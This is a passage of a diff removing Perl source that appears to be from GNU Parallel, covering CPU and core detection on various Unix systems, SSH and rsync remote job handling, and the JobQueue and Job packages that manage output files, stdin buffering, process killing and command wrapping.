-    #   undef if not Solaris
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    if(-x "/usr/sbin/prtconf") {
-        my @prtconf = `/usr/sbin/prtconf | grep cpu..instance`;
-        if($#prtconf >= 0) {
-            return $#prtconf +1;
-        }
-    }
-    return undef;
-}
-
-sub no_of_cpus_aix {
-    # Returns:
-    #   Number of physical CPUs on AIX
-    #   undef if not AIX
-    my $no_of_cpus = 0;
-    if(-x "/usr/sbin/lscfg") {
-	open(my $in_fh, "-|", "/usr/sbin/lscfg -vs |grep proc | wc -l|tr -d ' '")
-	    || return undef;
-	$no_of_cpus = <$in_fh>;
-	chomp ($no_of_cpus);
-	close $in_fh;
-    }
-    return $no_of_cpus;
-}
-
-sub no_of_cores_aix {
-    # Returns:
-    #   Number of CPU cores on AIX
-    #   undef if not AIX
-    my $no_of_cores;
-    if(-x "/usr/bin/vmstat") {
-	open(my $in_fh, "-|", "/usr/bin/vmstat 1 1") || return undef;
-	while(<$in_fh>) {
-	    /lcpu=([0-9]*) / and $no_of_cores = $1;
-	}
-	close $in_fh;
-    }
-    return $no_of_cores;
-}
-
-sub no_of_cpus_hpux {
-    # Returns:
-    #   Number of physical CPUs on HP-UX
-    #   undef if not HP-UX
-    my $no_of_cpus =
-        (`/usr/bin/mpsched -s 2>&1 | grep 'Locality Domain Count' | awk '{ print \$4 }'`);
-    return $no_of_cpus;
-}
-
-sub no_of_cores_hpux {
-    # Returns:
-    #   Number of CPU cores on HP-UX
-    #   undef if not HP-UX
-    my $no_of_cores =
-        (`/usr/bin/mpsched -s 2>&1 | grep 'Processor Count' | awk '{ print \$3 }'`);
-    return $no_of_cores;
-}
-
-sub no_of_cpus_qnx {
-    # Returns:
-    #   Number of physical CPUs on QNX
-    #   undef if not QNX
-    # BUG: It is now known how to calculate this.
-    my $no_of_cpus = 0;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_qnx {
-    # Returns:
-    #   Number of CPU cores on QNX
-    #   undef if not QNX
-    # BUG: It is now known how to calculate this.
-    my $no_of_cores = 0;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_openserver {
-    # Returns:
-    #   Number of physical CPUs on SCO OpenServer
-    #   undef if not SCO OpenServer
-    my $no_of_cpus = 0;
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    return $no_of_cpus;
-}
-
-sub no_of_cores_openserver {
-    # Returns:
-    #   Number of CPU cores on SCO OpenServer
-    #   undef if not SCO OpenServer
-    my $no_of_cores = 0;
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    return $no_of_cores;
-}
-
-sub no_of_cpus_irix {
-    # Returns:
-    #   Number of physical CPUs on IRIX
-    #   undef if not IRIX
-    my $no_of_cpus = `hinv | grep HZ | grep Processor | awk '{print \$1}'`;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_irix {
-    # Returns:
-    #   Number of CPU cores on IRIX
-    #   undef if not IRIX
-    my $no_of_cores = `hinv | grep HZ | grep Processor | awk '{print \$1}'`;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_tru64 {
-    # Returns:
-    #   Number of physical CPUs on Tru64
-    #   undef if not Tru64
-    my $no_of_cpus = `sizer -pr`;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_tru64 {
-    # Returns:
-    #   Number of CPU cores on Tru64
-    #   undef if not Tru64
-    my $no_of_cores = `sizer -pr`;
-    return $no_of_cores;
-}
-
-sub sshcommand {
-    my $self = shift;
-    if (not defined $self->{'sshcommand'}) {
-        $self->sshcommand_of_sshlogin();
-    }
-    return $self->{'sshcommand'};
-}
-
-sub serverlogin {
-    my $self = shift;
-    if (not defined $self->{'serverlogin'}) {
-        $self->sshcommand_of_sshlogin();
-    }
-    return $self->{'serverlogin'};
-}
-
-sub sshcommand_of_sshlogin {
-    # 'server' -> ('ssh -S /tmp/parallel-ssh-RANDOM/host-','server')
-    # 'user@server' -> ('ssh','user@server')
-    # 'myssh user@server' -> ('myssh','user@server')
-    # 'myssh -l user server' -> ('myssh -l user','server')
-    # '/usr/bin/myssh -l user server' -> ('/usr/bin/myssh -l user','server')
-    # Returns:
-    #   sshcommand - defaults to 'ssh'
-    #   login@host
-    my $self = shift;
-    my ($sshcmd, $serverlogin);
-    if($self->{'string'} =~ /(.+) (\S+)$/) {
-        # Own ssh command
-        $sshcmd = $1; $serverlogin = $2;
-    } else {
-        # Normal ssh
-        if($opt::controlmaster) {
-            # Use control_path to make ssh faster
-            my $control_path = $self->control_path_dir()."/ssh-%r@%h:%p";
-            $sshcmd = "ssh -S ".$control_path;
-            $serverlogin = $self->{'string'};
-            if(not $self->{'control_path'}{$control_path}++) {
-                # Master is not running for this control_path
-                # Start it
-                my $pid = fork();
-                if($pid) {
-                    $Global::sshmaster{$pid} ||= 1;
-                } else {
-		    $SIG{'TERM'} = undef;
-                    # Ignore the 'foo' being printed
-                    open(STDOUT,">","/dev/null");
-                    # OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-                    # STDERR >/dev/null to ignore "process_mux_new_session: tcgetattr: Invalid argument"
-                    open(STDERR,">","/dev/null");
-                    open(STDIN,"<","/dev/null");
-                    # Run a sleep that outputs data, so it will discover if the ssh connection closes.
-                    my $sleep = ::shell_quote_scalar('$|=1;while(1){sleep 1;print "foo\n"}');
-                    my @master = ("ssh", "-tt", "-MTS", $control_path, $serverlogin, "perl", "-e", $sleep);
-                    exec(@master);
-                }
-            }
-        } else {
-            $sshcmd = "ssh"; $serverlogin = $self->{'string'};
-        }
-    }
-    $self->{'sshcommand'} = $sshcmd;
-    $self->{'serverlogin'} = $serverlogin;
-}
-
-sub control_path_dir {
-    # Returns:
-    #   path to directory
-    my $self = shift;
-    if(not defined $self->{'control_path_dir'}) {
-        -e $ENV{'HOME'}."/.parallel" or mkdir $ENV{'HOME'}."/.parallel";
-        -e $ENV{'HOME'}."/.parallel/tmp" or mkdir $ENV{'HOME'}."/.parallel/tmp";
-        $self->{'control_path_dir'} =
-	    File::Temp::tempdir($ENV{'HOME'}
-				. "/.parallel/tmp/control_path_dir-XXXX",
-				CLEANUP => 1);
-    }
-    return $self->{'control_path_dir'};
-}
-
-sub rsync_transfer_cmd {
-    # Command to run to transfer a file
-    # Input:
-    #   $file = filename of file to transfer
-    #   $workdir = destination dir
-    # Returns:
-    #   $cmd = rsync command to run to transfer $file ("" if unreadable)
-    my $self = shift;
-    my $file = shift;
-    my $workdir = shift;
-    if(not -r $file) {
-	::warning($file, " is not readable and will not be transferred.\n");
-	return "true";
-    }
-    my $rsync_destdir;
-    if($file =~ m:^/:) {
-	# rsync /foo/bar /
-	$rsync_destdir = "/";
-    } else {
-	$rsync_destdir = ::shell_quote_file($workdir);
-    }
-    $file = ::shell_quote_file($file);
-    my $sshcmd = $self->sshcommand();
-    my $rsync_opt = "-rlDzR -e" . ::shell_quote_scalar($sshcmd);
-    my $serverlogin = $self->serverlogin();
-    # Make dir if it does not exist
-    return "( $sshcmd $serverlogin mkdir -p $rsync_destdir;" .
-	rsync()." $rsync_opt $file $serverlogin:$rsync_destdir )";
-}
-
-sub cleanup_cmd {
-    # Command to run to remove the remote file
-    # Input:
-    #   $file = filename to remove
-    #   $workdir = destination dir
-    # Returns:
-    #   $cmd = ssh command to run to remove $file and empty parent dirs
-    my $self = shift;
-    my $file = shift;
-    my $workdir = shift;
-    my $f = $file;
-    if($f =~ m:/\./:) {
-	# foo/bar/./baz/quux => workdir/baz/quux
-	# /foo/bar/./baz/quux => workdir/baz/quux
-	$f =~ s:.*/\./:$workdir/:;
-    } elsif($f =~ m:^[^/]:) {
-	# foo/bar => workdir/foo/bar
-	$f = $workdir."/".$f;
-    }
-    my @subdirs = split m:/:, ::dirname($f);
-    my @rmdir;
-    my $dir = "";
-    for(@subdirs) {
-	$dir .= $_."/";
-	unshift @rmdir, ::shell_quote_file($dir);
-    }
-    my $rmdir = @rmdir ? "rmdir @rmdir 2>/dev/null;" : "";
-    if(defined $opt::workdir and $opt::workdir eq "...") {
-	$rmdir .= "rm -rf " . ::shell_quote_file($workdir).';';
-    }
-
-    $f = ::shell_quote_file($f);
-    my $sshcmd = $self->sshcommand();
-    my $serverlogin = $self->serverlogin();
-    return "$sshcmd $serverlogin ".::shell_quote_scalar("(rm -f $f; $rmdir)");
-}
-
-{
-    my $rsync;
-
-    sub rsync {
-	# rsync 3.1.x uses protocol 31 which is unsupported by 2.5.7.
-	# If the version >= 3.1.0: downgrade to protocol 30
-	if(not $rsync) {
-	    my @out = `rsync --version`;
-	    for (@out) {
-		if(/version (\d+.\d+)(.\d+)?/) {
-		    if($1 >= 3.1) {
-			# Version 3.1.0 or later: Downgrade to protocol 30
-			$rsync = "rsync --protocol 30";
-		    } else {
-			$rsync = "rsync";
-		    }
-		}
-	    }
-	    $rsync or ::die_bug("Cannot figure out version of rsync: @out");
-	}
-	return $rsync;
-    }
-}
-
-
-package JobQueue;
-
-sub new {
-    my $class = shift;
-    my $commandref = shift;
-    my $read_from = shift;
-    my $context_replace = shift;
-    my $max_number_of_args = shift;
-    my $return_files = shift;
-    my $commandlinequeue = CommandLineQueue->new
-	($commandref, $read_from, $context_replace, $max_number_of_args,
-	 $return_files);
-    my @unget = ();
-    return bless {
-        'unget' => \@unget,
-        'commandlinequeue' => $commandlinequeue,
-        'total_jobs' => undef,
-    }, ref($class) || $class;
-}
-
-sub get {
-    my $self = shift;
-
-    if(@{$self->{'unget'}}) {
-        my $job = shift @{$self->{'unget'}};
-        return ($job);
-    } else {
-        my $commandline = $self->{'commandlinequeue'}->get();
-        if(defined $commandline) {
-            my $job = Job->new($commandline);
-            return $job;
-        } else {
-            return undef;
-        }
-    }
-}
-
-sub unget {
-    my $self = shift;
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @{$self->{'unget'}})
-	&& $self->{'commandlinequeue'}->empty();
-    ::debug("run", "JobQueue->empty $empty ");
-    return $empty;
-}
-
-sub total_jobs {
-    my $self = shift;
-    if(not defined $self->{'total_jobs'}) {
-        my $job;
-        my @queue;
-	my $start = time;
-        while($job = $self->get()) {
-	    if(time - $start > 10) {
-		::warning("Reading all arguments takes longer than 10 seconds.\n");
-		$opt::eta && ::warning("Consider removing --eta.\n");
-		$opt::bar && ::warning("Consider removing --bar.\n");
-		last;
-	    }
-            push @queue, $job;
-        }
-        while($job = $self->get()) {
-            push @queue, $job;
-        }
-
-        $self->unget(@queue);
-        $self->{'total_jobs'} = $#queue+1;
-    }
-    return $self->{'total_jobs'};
-}
-
-sub next_seq {
-    my $self = shift;
-
-    return $self->{'commandlinequeue'}->seq();
-}
-
-sub quote_args {
-    my $self = shift;
-    return $self->{'commandlinequeue'}->quote_args();
-}
-
-
-package Job;
-
-sub new {
-    my $class = shift;
-    my $commandlineref = shift;
-    return bless {
-        'commandline' => $commandlineref, # CommandLine object
-        'workdir' => undef, # --workdir
-        'stdin' => undef, # filehandle for stdin (used for --pipe)
-	# filename for writing stdout to (used for --files)
-        'remaining' => "", # remaining data not sent to stdin (used for --pipe)
-	'datawritten' => 0, # amount of data sent via stdin (used for --pipe)
-        'transfersize' => 0, # size of files using --transfer
-        'returnsize' => 0, # size of files using --return
-        'pid' => undef,
-        # hash of { SSHLogins => number of times the command failed there }
-        'failed' => undef,
-        'sshlogin' => undef,
-        # The commandline wrapped with rsync and ssh
-        'sshlogin_wrap' => undef,
-        'exitstatus' => undef,
-        'exitsignal' => undef,
-	# Timestamp for timeout if any
-	'timeout' => undef,
-	'virgin' => 1,
-    }, ref($class) || $class;
-}
-
-sub replaced {
-    my $self = shift;
-    $self->{'commandline'} or ::die_bug("commandline empty");
-    return $self->{'commandline'}->replaced();
-}
-
-sub seq {
-    my $self = shift;
-    return $self->{'commandline'}->seq();
-}
-
-sub slot {
-    my $self = shift;
-    return $self->{'commandline'}->slot();
-}
-
-{
-    my($cattail);
-
-    sub cattail {
-	# Returns:
-	#   $cattail = perl program for: cattail "decompress program" writerpid [file_to_decompress or stdin] [file_to_unlink]
-	if(not $cattail) {
-	    $cattail = q{
-		# cat followed by tail.
-		# If $writerpid dead: finish after this round
-		use Fcntl;
-
-		$|=1;
-
-		my ($cmd, $writerpid, $read_file, $unlink_file) = @ARGV;
-		if($read_file) {
-		    open(IN,"<",$read_file) || die("cattail: Cannot open $read_file");
-		} else {
-		    *IN = *STDIN;
-		}
-
-		my $flags;
-		fcntl(IN, F_GETFL, $flags) || die $!; # Get the current flags on the filehandle
-		$flags |= O_NONBLOCK; # Add non-blocking to the flags
-		fcntl(IN, F_SETFL, $flags) || die $!; # Set the flags on the filehandle
-		open(OUT,"|-",$cmd) || die("cattail: Cannot run $cmd");
-
-		while(1) {
-		    # clear EOF
-		    seek(IN,0,1);
-		    my $writer_running = kill 0, $writerpid;
-		    $read = sysread(IN,$buf,32768);
-		    if($read) {
-			# We can unlink the file now: The writer has written something
-			-e $unlink_file and unlink $unlink_file;
-			# Blocking print
-			while($buf) {
-			    my $bytes_written = syswrite(OUT,$buf);
-			    # syswrite may be interrupted by SIGHUP
-			    substr($buf,0,$bytes_written) = "";
-			}
-			# Something printed: Wait less next time
-			$sleep /= 2;
-		    } else {
-			if(eof(IN) and not $writer_running) {
-			    # Writer dead: There will never be more to read => exit
-			    exit;
-			}
-			# TODO This could probably be done more efficiently using select(2)
-			# Nothing read: Wait longer before next read
-			# Up to 30 milliseconds
-			$sleep = ($sleep < 30) ? ($sleep * 1.001 + 0.01) : ($sleep);
-			usleep($sleep);
-		    }
-		}
-
-		sub usleep {
-		    # Sleep this many milliseconds.
-		    my $secs = shift;
-		    select(undef, undef, undef, $secs/1000);
-		}
-	    };
-	    $cattail =~ s/#.*//mg;
-	    $cattail =~ s/\s+/ /g;
-	}
-	return $cattail;
-    }
-}
-
-sub openoutputfiles {
-    # Open files for STDOUT and STDERR
-    # Set file handles in $self->fh
-    my $self = shift;
-    my ($outfhw, $errfhw, $outname, $errname);
-    if($opt::results) {
-	my $args_as_dirname = $self->{'commandline'}->args_as_dirname();
-	# Output in: prefix/name1/val1/name2/val2/stdout
-	my $dir = $opt::results."/".$args_as_dirname;
-	if(eval{ File::Path::mkpath($dir); }) {
-	    # OK
-	} else {
-	    # mkpath failed: Argument probably too long.
-	    # Set $Global::max_file_length, which will keep the individual
-	    # dir names shorter than the max length
-	    max_file_name_length($opt::results);
-	    $args_as_dirname = $self->{'commandline'}->args_as_dirname();
-	    # prefix/name1/val1/name2/val2/
-	    $dir = $opt::results."/".$args_as_dirname;
-	    File::Path::mkpath($dir);
-	}
-	# prefix/name1/val1/name2/val2/stdout
-	$outname = "$dir/stdout";
-	if(not open($outfhw, "+>", $outname)) {
-	    ::error("Cannot write to `$outname'.\n");
-	    ::wait_and_exit(255);
-	}
-	# prefix/name1/val1/name2/val2/stderr
-	$errname = "$dir/stderr";
-	if(not open($errfhw, "+>", $errname)) {
-	    ::error("Cannot write to `$errname'.\n");
-	    ::wait_and_exit(255);
-	}
-	$self->set_fh(1,"unlink","");
-	$self->set_fh(2,"unlink","");
-    } elsif(not $opt::ungroup) {
-	# To group we create temporary files for STDOUT and STDERR
-	# To avoid the cleanup unlink the files immediately (but keep them open)
-	if(@Global::tee_jobs) {
-	    # files must be removed when the tee is done
-	} elsif($opt::files) {
-	    ($outfhw, $outname) = ::tmpfile(SUFFIX => ".par");
-	    ($errfhw, $errname) = ::tmpfile(SUFFIX => ".par");
-	    # --files => only remove stderr
-	    $self->set_fh(1,"unlink","");
-	    $self->set_fh(2,"unlink",$errname);
-	} else {
-	    ($outfhw, $outname) = ::tmpfile(SUFFIX => ".par");
-	    ($errfhw, $errname) = ::tmpfile(SUFFIX => ".par");
-	    $self->set_fh(1,"unlink",$outname);
-	    $self->set_fh(2,"unlink",$errname);
-	}
-    } else {
-	# --ungroup
-	open($outfhw,">&",$Global::fd{1}) || die;
-	open($errfhw,">&",$Global::fd{2}) || die;
-	# File name must be empty as it will otherwise be printed
-	$outname = "";
-	$errname = "";
-	$self->set_fh(1,"unlink",$outname);
-	$self->set_fh(2,"unlink",$errname);
-    }
-    # Set writing FD
-    $self->set_fh(1,'w',$outfhw);
-    $self->set_fh(2,'w',$errfhw);
-    $self->set_fh(1,'name',$outname);
-    $self->set_fh(2,'name',$errname);
-    if($opt::compress) {
-	# Send stdout to stdin for $opt::compress_program(1)
-	# Send stderr to stdin for $opt::compress_program(2)
-	# cattail get pid:  $pid = $self->fh($fdno,'rpid');
-	my $cattail = cattail();
-	for my $fdno (1,2) {
-	    my $wpid = open(my $fdw,"|-","$opt::compress_program >>".
-			    $self->fh($fdno,'name')) || die $?;
-	    $self->set_fh($fdno,'w',$fdw);
-	    $self->set_fh($fdno,'wpid',$wpid);
-	    my $rpid = open(my $fdr, "-|", "perl", "-e", $cattail,
-			    $opt::decompress_program, $wpid,
-			    $self->fh($fdno,'name'),$self->fh($fdno,'unlink')) || die $?;
-	    $self->set_fh($fdno,'r',$fdr);
-	    $self->set_fh($fdno,'rpid',$rpid);
-	}
-    } elsif(not $opt::ungroup) {
-	# Set reading FD if using --group (--ungroup does not need)
-	for my $fdno (1,2) {
-	    # Re-open the file for reading
-	    # so fdw can be closed seperately
-	    # and fdr can be seeked seperately (for --line-buffer)
-	    open(my $fdr,"<", $self->fh($fdno,'name')) ||
-		::die_bug("fdr: Cannot open ".$self->fh($fdno,'name'));
-	    $self->set_fh($fdno,'r',$fdr);
-            # Unlink if required
-	    $Global::debug or unlink $self->fh($fdno,"unlink");
-	}
-    }
-    if($opt::linebuffer) {
-	# Set non-blocking when using --linebuffer
-	$Global::use{"Fcntl"} ||= eval "use Fcntl qw(:DEFAULT :flock); 1;";
-	for my $fdno (1,2) {
-	    my $fdr = $self->fh($fdno,'r');
-	    my $flags;
-	    fcntl($fdr, &F_GETFL, $flags) || die $!; # Get the current flags on the filehandle
-	    $flags |= &O_NONBLOCK; # Add non-blocking to the flags
-	    fcntl($fdr, &F_SETFL, $flags) || die $!; # Set the flags on the filehandle
-	}
-    }
-}
-
-sub max_file_name_length {
-    # Figure out the max length of a subdir
-    # TODO and the max total length
-    # Ext4 = 255,130816
-    my $testdir = shift;
-
-    my $upper = 8_000_000;
-    my $len = 8;
-    my $dir="x"x$len;
-    do {
-	rmdir($testdir."/".$dir);
-	$len *= 16;
-	$dir="x"x$len;
-    } while (mkdir $testdir."/".$dir);
-    # Then search for the actual max length between $len/16 and $len
-    my $min = $len/16;
-    my $max = $len;
-    while($max-$min > 5) {
-	# If we are within 5 chars of the exact value:
-	# it is not worth the extra time to find the exact value
-	my $test = int(($min+$max)/2);
-	$dir="x"x$test;
-	if(mkdir $testdir."/".$dir) {
-	    rmdir($testdir."/".$dir);
-	    $min = $test;
-	} else {
-	    $max = $test;
-	}
-    }
-    $Global::max_file_length = $min;
-    return $min;
-}
-
-sub set_fh {
-    # Set file handle
-    my ($self, $fd_no, $key, $fh) = @_;
-    $self->{'fd'}{$fd_no,$key} = $fh;
-}
-
-sub fh {
-    # Get file handle
-    my ($self, $fd_no, $key) = @_;
-    return $self->{'fd'}{$fd_no,$key};
-}
-
-sub write {
-    my $self = shift;
-    my $remaining_ref = shift;
-    my $stdin_fh = $self->fh(0,"w");
-    syswrite($stdin_fh,$$remaining_ref);
-}
-
-sub set_stdin_buffer {
-    # Copy stdin buffer from $block_ref up to $endpos
-    # Prepend with $header_ref
-    # Remove $recstart and $recend if needed
-    # Input:
-    #   $header_ref = ref to $header to prepend
-    #   $block_ref = ref to $block to pass on
-    #   $endpos = length of $block to pass on
-    #   $recstart = --recstart regexp
-    #   $recend = --recend regexp
-    # Returns:
-    #   N/A
-    my $self = shift;
-    my ($header_ref,$block_ref,$endpos,$recstart,$recend) = @_;
-    $self->{'stdin_buffer'} = ($self->virgin() ? $$header_ref : "").substr($$block_ref,0,$endpos);
-    if($opt::remove_rec_sep) {
-	remove_rec_sep(\$self->{'stdin_buffer'},$recstart,$recend);
-    }
-    $self->{'stdin_buffer_length'} = length $self->{'stdin_buffer'};
-    $self->{'stdin_buffer_pos'} = 0;
-}
-
-sub stdin_buffer_length {
-    my $self = shift;
-    return $self->{'stdin_buffer_length'};
-}
-
-sub remove_rec_sep {
-    my ($block_ref,$recstart,$recend) = @_;
-    # Remove record separator
-    $$block_ref =~ s/$recend$recstart//gos;
-    $$block_ref =~ s/^$recstart//os;
-    $$block_ref =~ s/$recend$//os;
-}
-
-sub non_block_write {
-    my $self = shift;
-    my $something_written = 0;
-    use POSIX qw(:errno_h);
-#    use Fcntl;
-#    my $flags = '';
-    for my $buf (substr($self->{'stdin_buffer'},$self->{'stdin_buffer_pos'})) {
-	my $in = $self->fh(0,"w");
-#	fcntl($in, F_GETFL, $flags)
-#	    or die "Couldn't get flags for HANDLE : $!\n";
-#	$flags |= O_NONBLOCK;
-#	fcntl($in, F_SETFL, $flags)
-#	    or die "Couldn't set flags for HANDLE: $!\n";
-	my $rv = syswrite($in, $buf);
-	if (!defined($rv) && $! == EAGAIN) {
-	    # would block
-	    $something_written = 0;
-	} elsif ($self->{'stdin_buffer_pos'}+$rv != $self->{'stdin_buffer_length'}) {
-	    # incomplete write
-	    # Remove the written part
-	    $self->{'stdin_buffer_pos'} += $rv;
-	    $something_written = $rv;
-	} else {
-	    # successfully wrote everything
-	    my $a="";
-	    $self->set_stdin_buffer(\$a,\$a,"","");
-	    $something_written = $rv;
-	}
-    }
-
-    ::debug("pipe", "Non-block: ", $something_written);
-    return $something_written;
-}
-
-
-sub virgin {
-    my $self = shift;
-    return $self->{'virgin'};
-}
-
-sub set_virgin {
-    my $self = shift;
-    $self->{'virgin'} = shift;
-}
-
-sub pid {
-    my $self = shift;
-    return $self->{'pid'};
-}
-
-sub set_pid {
-    my $self = shift;
-    $self->{'pid'} = shift;
-}
-
-sub starttime {
-    # Returns:
-    #   UNIX-timestamp this job started
-    my $self = shift;
-    return sprintf("%.3f",$self->{'starttime'});
-}
-
-sub set_starttime {
-    my $self = shift;
-    my $starttime = shift || ::now();
-    $self->{'starttime'} = $starttime;
-}
-
-sub runtime {
-    # Returns:
-    #   Run time in seconds
-    my $self = shift;
-    return sprintf("%.3f",int(($self->endtime() - $self->starttime())*1000)/1000);
-}
-
-sub endtime {
-    # Returns:
-    #   UNIX-timestamp this job ended
-    #   0 if not ended yet
-    my $self = shift;
-    return ($self->{'endtime'} || 0);
-}
-
-sub set_endtime {
-    my $self = shift;
-    my $endtime = shift;
-    $self->{'endtime'} = $endtime;
-}
-
-sub timedout {
-    # Is the job timedout?
-    # Input:
-    #   $delta_time = time that the job may run
-    # Returns:
-    #   True or false
-    my $self = shift;
-    my $delta_time = shift;
-    return time > $self->{'starttime'} + $delta_time;
-}
-
-sub kill {
-    # Kill the job.
-    # Send the signals to (grand)*children and pid.
-    # If no signals: TERM TERM KILL
-    # Wait 200 ms after each TERM.
-    # Input:
-    #   @signals = signals to send
-    my $self = shift;
-    my @signals = @_;
-    my @family_pids = $self->family_pids();
-    # Record this jobs as failed
-    $self->set_exitstatus(-1);
-    # Send two TERMs to give time to clean up
-    ::debug("run", "Kill seq ", $self->seq(), "\n");
-    my @send_signals = @signals || ("TERM", "TERM", "KILL");
-    for my $signal (@send_signals) {
-	my $alive = 0;
-	for my $pid (@family_pids) {
-	    if(kill 0, $pid) {
-		# The job still running
-		kill $signal, $pid;
-		$alive = 1;
-	    }
-	}
-	# If a signal was given as input, do not do the sleep below
-	@signals and next;
-
-	if($signal eq "TERM" and $alive) {
-	    # Wait up to 200 ms between TERMs - but only if any pids are alive
-	    my $sleep = 1;
-	    for (my $sleepsum = 0; kill 0, $family_pids[0] and $sleepsum < 200;
-		 $sleepsum += $sleep) {
-		$sleep = ::reap_usleep($sleep);
-	    }
-	}
-    }
-}
-
-sub family_pids {
-    # Find the pids with this->pid as (grand)*parent
-    # Returns:
-    #   @pids = pids of (grand)*children
-    my $self = shift;
-    my $pid = $self->pid();
-    my @pids;
-
-    my ($children_of_ref, $parent_of_ref, $name_of_ref) = ::pid_table();
-
-    my @more = ($pid);
-    # While more (grand)*children
-    while(@more) {
-	my @m;
-	push @pids, @more;
-	for my $parent (@more) {
-	    if($children_of_ref->{$parent}) {
-		# add the children of this parent
-		push @m, @{$children_of_ref->{$parent}};
-	    }
-	}
-	@more = @m;
-    }
-    return (@pids);
-}
-
-sub failed {
-    # return number of times failed for this $sshlogin
-    # Input:
-    #   $sshlogin
-    # Returns:
-    #   Number of times failed for $sshlogin
-    my $self = shift;
-    my $sshlogin = shift;
-    return $self->{'failed'}{$sshlogin};
-}
-
-sub failed_here {
-    # return number of times failed for the current $sshlogin
-    # Returns:
-    #   Number of times failed for this sshlogin
-    my $self = shift;
-    return $self->{'failed'}{$self->sshlogin()};
-}
-
-sub add_failed {
-    # increase the number of times failed for this $sshlogin
-    my $self = shift;
-    my $sshlogin = shift;
-    $self->{'failed'}{$sshlogin}++;
-}
-
-sub add_failed_here {
-    # increase the number of times failed for the current $sshlogin
-    my $self = shift;
-    $self->{'failed'}{$self->sshlogin()}++;
-}
-
-sub reset_failed {
-    # increase the number of times failed for this $sshlogin
-    my $self = shift;
-    my $sshlogin = shift;
-    delete $self->{'failed'}{$sshlogin};
-}
-
-sub reset_failed_here {
-    # increase the number of times failed for this $sshlogin
-    my $self = shift;
-    delete $self->{'failed'}{$self->sshlogin()};
-}
-
-sub min_failed {
-    # Returns:
-    #   the number of sshlogins this command has failed on
-    #   the minimal number of times this command has failed
-    my $self = shift;
-    my $min_failures =
-	::min(map { $self->{'failed'}{$_} } keys %{$self->{'failed'}});
-    my $number_of_sshlogins_failed_on = scalar keys %{$self->{'failed'}};
-    return ($number_of_sshlogins_failed_on,$min_failures);
-}
-
-sub total_failed {
-    # Returns:
-    #   $total_failures = the number of times this command has failed
-    my $self = shift;
-    my $total_failures = 0;
-    for (values %{$self->{'failed'}}) {
-	$total_failures += $_;
-    }
-    return $total_failures;
-}
-
-sub wrapped {
-    # Wrap command with:
-    # * --shellquote
-    # * --nice
-    # * --cat
-    # * --fifo
-    # * --sshlogin
-    # * --pipepart (@Global::cat_partials)
-    # * --pipe
-    # * --tmux
-    # The ordering of the wrapping is important:
-    # * --nice/--cat/--fifo should be done on the remote machine
-    # * --pipepart/--pipe should be done on the local machine inside --tmux
-    # Uses:
-    #   $Global::envvar
-    #   $opt::shellquote
-    #   $opt::nice
-    #   $Global::shell
-    #   $opt::cat
-    #   $opt::fifo
-    #   @Global::cat_partials
-    #   $opt::pipe
-    #   $opt::tmux
-    # Returns:
-    #   $self->{'wrapped'} = the command wrapped with the above
-    my $self = shift;
-    if(not defined $self->{'wrapped'}) {
-	my $command = $Global::envvar.$self->replaced();
-	if($opt::shellquote) {
-	    # Prepend echo
-	    # and quote twice
-	    $command = "echo " .
-		::shell_quote_scalar(::shell_quote_scalar($command));
-	}
-	if($opt::nice) {
-	    # Prepend \nice -n19 $SHELL -c
-	    # and quote.
-	    # The '\' before nice is needed to avoid tcsh's built-in
-	    $command = '\nice'. " -n". $opt::nice. " ".
-		$Global::shell. " -c ".
-		::shell_quote_scalar($command);
-	}
-	if($opt::cat) {
-	    # Prepend 'cat > {};'
-	    # Append '_EXIT=$?;(rm {};exit $_EXIT)'
-	    $command =
-		$self->{'commandline'}->replace_placeholders(["cat > \257<\257>; "], 0, 0).
-		$command.
-		$self->{'commandline'}->replace_placeholders(
-		    ["; _EXIT=\$?; rm \257<\257>; exit \$_EXIT"], 0, 0);
-	} elsif($opt::fifo) {
-	    # Prepend 'mkfifo {}; ('
-	    # Append ') & _PID=$!; cat > {}; wait $_PID; _EXIT=$?;(rm {};exit $_EXIT)'
-	    $command =
-		$self->{'commandline'}->replace_placeholders(["mkfifo \257<\257>; ("], 0, 0).
-		$command.
-		$self->{'commandline'}->replace_placeholders([") & _PID=\$!; cat > \257<\257>; ",
-					    "wait \$_PID; _EXIT=\$?; ",
-					    "rm \257<\257>; exit \$_EXIT"],
-					    0,0);
-	}
-	# Wrap with ssh + tranferring of files
-	$command = $self->sshlogin_wrap($command);
-	if(@Global::cat_partials) {
-	    # Prepend:
-	    # < /tmp/foo perl -e 'while(@ARGV) { sysseek(STDIN,shift,0) || die; $left = shift; while($read = sysread(STDIN,$buf, ($left > 32768 ? 32768 : $left))){ $left -= $read; syswrite(STDOUT,$buf); } }'  0 0 0 11 |
-	    $command = (shift @Global::cat_partials). "|". "(". $command. ")";
-	} elsif($opt::pipe) {
-	    # Prepend EOF-detector to avoid starting $command if EOF.
-	    # The $tmpfile might exist if run on a remote system - we accept that risk
-	    my ($dummy_fh, $tmpfile) = ::tmpfile(SUFFIX => ".chr");
-	    # Unlink to avoid leaving files if --dry-run or --sshlogin
-	    unlink $tmpfile;
-	    $command =
-		# Exit value:
-		#   empty input = true
-		#   some input = exit val from command
-		qq{ sh -c 'dd bs=1 count=1 of=$tmpfile 2>/dev/null'; }.
-		qq{ test \! -s "$tmpfile" && rm -f "$tmpfile" && exec true; }.
-		qq{ (cat $tmpfile; rm $tmpfile; cat - ) | }.
-		"($command);";
-	}
-	if($opt::tmux) {
-	    # Wrap command with 'tmux'
-	    $command = $self->tmux_wrap($command);
-	}
-	$self->{'wrapped'} = $command;
-    }
-    return $self->{'wrapped'};
-}
-
-sub set_sshlogin {
-    my $self = shift;
-    my $sshlogin = shift;
-    $self->{'sshlogin'} = $sshlogin;
